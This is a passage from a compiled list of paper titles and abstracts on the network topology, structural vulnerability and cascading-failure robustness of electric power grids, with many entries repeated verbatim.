The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. 
The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness.
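As a rough, illustrative sketch of the Bak-Tang-Wiesenfeld sandpile dynamics discussed in the entry above, the following Python snippet (assuming the networkx library; the Watts-Strogatz test graphs, the number of inter-ties and the small dissipation probability are illustrative choices and not the cited authors' setup) drops grains onto two coupled synthetic networks and records the resulting cascade sizes.

```python
import random
import networkx as nx

def btw_cascade_sizes(G, n_grains=5000, dissipation=0.05, seed=0):
    """Toy Bak-Tang-Wiesenfeld sandpile on graph G.

    A node topples once its load reaches its degree, sending one grain to
    each neighbour; every transferred grain is lost with a small dissipation
    probability so that the toy process settles into a steady state.
    Returns the number of topplings triggered by each dropped grain.
    """
    rng = random.Random(seed)
    load = {v: 0 for v in G}
    threshold = {v: max(G.degree(v), 1) for v in G}
    nodes = list(G)
    sizes = []
    for _ in range(n_grains):
        load[rng.choice(nodes)] += 1
        unstable = [v for v in nodes if load[v] >= threshold[v]]
        topplings = 0
        while unstable:
            u = unstable.pop()
            if load[u] < threshold[u]:
                continue
            load[u] -= threshold[u]
            topplings += 1
            for w in G.neighbors(u):
                if rng.random() < dissipation:
                    continue  # grain shed out of the system
                load[w] += 1
                if load[w] >= threshold[w]:
                    unstable.append(w)
        sizes.append(topplings)
    return sizes

# Two sparse synthetic "grids" joined by a handful of inter-ties.
A = nx.connected_watts_strogatz_graph(200, 4, 0.1, seed=1)
B = nx.connected_watts_strogatz_graph(200, 4, 0.1, seed=2)
coupled = nx.disjoint_union(A, B)          # nodes of B are relabelled 200..399
rng = random.Random(3)
for _ in range(10):                        # interconnectivity level to vary
    coupled.add_edge(rng.randrange(0, 200), rng.randrange(200, 400))

sizes = btw_cascade_sizes(coupled)
print("largest cascade:", max(sizes), "mean size:", sum(sizes) / len(sizes))
```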
--- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. 
We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. 
More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyzes have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network. --- paper_title: The Improvement of the Small-world Network Model and Its Application Research in Bulk Power System paper_content: Due to the complexity of cascading failures and blackouts, the small world theory for complex network research is employed in probing the mechanism of them. In the paper, the original small world network model has been modified in two ways. Firstly, the magnitude of the line impedance regarded as the weight of edges is taken into consideration which is not considered in the original model. The formulae of corresponding parameters of the model are also modified. The calculation results of some practical grids validate the correctness and effectiveness of the new model. Secondly, the complex number format of power flow is introduced as the network flow in the small world model. With the power flow and the topology of grids, the two main factors to the system vulnerability, considered, the improved small world model can be used as a tool for vulnerability analysis of grids. --- paper_title: Topological analysis of eastern region of Indian power grid paper_content: The modern power grid is tending towards more complexity as power has become an integral part of life even in remote location. Thus the vulnerability of such grids has become more prominent; necessitating some simulation based modeling to extract some important features for such sprawling network. The spatial structure of the power grid has been used for topological analysis of the power grid. The case studies pertaining to eastern region power grid of India validate such approach. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. 
This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. 
On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. 
--- paper_title: An Experimental Study of the Small World Problem paper_content: Arbitrarily selected individuals (N=296) in Nebraska and Boston are asked to generate acquaintance chains to a target person in Massachusetts, employing “the small world method” (Milgram, 1967). Sixty-four chains reach the target person. Within this group the mean number of intermediaries between starters and targets is 5.2. Boston starting chains reach the target person with fewer intermediaries than those starting in Nebraska; subpopulations in the Nebraska group do not differ among themselves. The funneling of chains through sociometric “stars” is noted, with 48 per cent of the chains passing through three persons before reaching the target. Applications of the method to studies of large scale social structure are discussed. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Improvement of the Small-world Network Model and Its Application Research in Bulk Power System paper_content: Due to the complexity of cascading failures and blackouts, the small world theory for complex network research is employed in probing the mechanism of them. In the paper, the original small world network model has been modified in two ways. Firstly, the magnitude of the line impedance regarded as the weight of edges is taken into consideration which is not considered in the original model. The formulae of corresponding parameters of the model are also modified. The calculation results of some practical grids validate the correctness and effectiveness of the new model.
Secondly, the complex number format of power flow is introduced as the network flow in the small world model. With both the power flow and the grid topology, the two main factors in system vulnerability, taken into account, the improved small world model can be used as a tool for vulnerability analysis of grids. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators, Josephson junction arrays, excitable media, neural networks, spatial games, genetic control networks and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon (popularly known as six degrees of separation). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Exploring complex networks paper_content: The study of networks pervades all of science, from neurobiology to statistical physics. The most basic issues are structural: how does one characterize the wiring diagram of a food web or the Internet or the metabolic network of the bacterium Escherichia coli? Are there any unifying principles underlying their topology? From the perspective of nonlinear dynamics, we would also like to understand how an enormous network of interacting dynamical systems — be they neurons, power stations or lasers — will behave collectively, given their individual dynamics and coupling architecture. Researchers are only now beginning to unravel the structure and dynamics of complex networks. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning.
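The small-world test invoked throughout these entries, high clustering combined with a short characteristic path length relative to an equivalent random graph, can be reproduced in a few lines; the sketch below assumes networkx and uses a rewired ring lattice purely as a stand-in for real transmission-grid data, with the sigma ratio serving as the usual (heuristic) small-world indicator.

```python
import networkx as nx

def small_world_summary(G, seed=0):
    """Clustering coefficient C and characteristic path length L of G,
    compared against an Erdos-Renyi graph with the same numbers of nodes
    and edges; sigma = (C/C_rand) / (L/L_rand) > 1 is commonly read as
    evidence of small-world structure."""
    n, m = G.number_of_nodes(), G.number_of_edges()
    C = nx.average_clustering(G)
    L = nx.average_shortest_path_length(G)      # G is assumed connected
    R = nx.gnm_random_graph(n, m, seed=seed)
    if not nx.is_connected(R):
        # path length is only defined on a connected graph
        R = R.subgraph(max(nx.connected_components(R), key=len)).copy()
    C_rand = nx.average_clustering(R)
    L_rand = nx.average_shortest_path_length(R)
    sigma = (C / C_rand) / (L / L_rand) if C_rand > 0 else float("inf")
    return {"C": C, "L": L, "C_rand": C_rand, "L_rand": L_rand, "sigma": sigma}

# Rewired ring lattice as a toy proxy for a sparsely meshed power grid.
grid_like = nx.connected_watts_strogatz_graph(300, 4, 0.05, seed=42)
print(small_world_summary(grid_like))
```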
--- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. 
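A bare-bones version of the error-and-attack-tolerance experiment used in the graph-model studies above (remove vertices at random or in decreasing degree order and track how the giant component shrinks) might look like the following; networkx is assumed, and the Barabasi-Albert test graph is only a placeholder for real grid topology data.

```python
import random
import networkx as nx

def giant_component_curve(G, strategy="random", step_fraction=0.05, seed=0):
    """Relative size of the largest connected component as nodes are removed,
    either uniformly at random ("random", i.e. errors) or by decreasing
    initial degree ("degree", i.e. a targeted attack)."""
    rng = random.Random(seed)
    H = G.copy()
    n0 = H.number_of_nodes()
    if strategy == "degree":
        order = sorted(H, key=lambda v: H.degree(v), reverse=True)
    else:
        order = rng.sample(list(H), n0)
    step = max(int(step_fraction * n0), 1)
    curve = [1.0]
    for i in range(0, n0 - step, step):
        H.remove_nodes_from(order[i:i + step])
        giant = max(nx.connected_components(H), key=len)
        curve.append(len(giant) / n0)
    return curve

G = nx.barabasi_albert_graph(500, 2, seed=1)   # scale-free reference topology
print("random failures:", [round(x, 2) for x in giant_component_curve(G, "random")[:6]])
print("degree attack:  ", [round(x, 2) for x in giant_component_curve(G, "degree")[:6]])
```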
--- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. 
The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmission substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Originally published in: WIT Transactions on Ecology and the Environment, 2009, vol. 121, p. 527-537 --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market.
Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators, Josephson junction arrays, excitable media, neural networks, spatial games, genetic control networks and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon (popularly known as six degrees of separation).
The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, 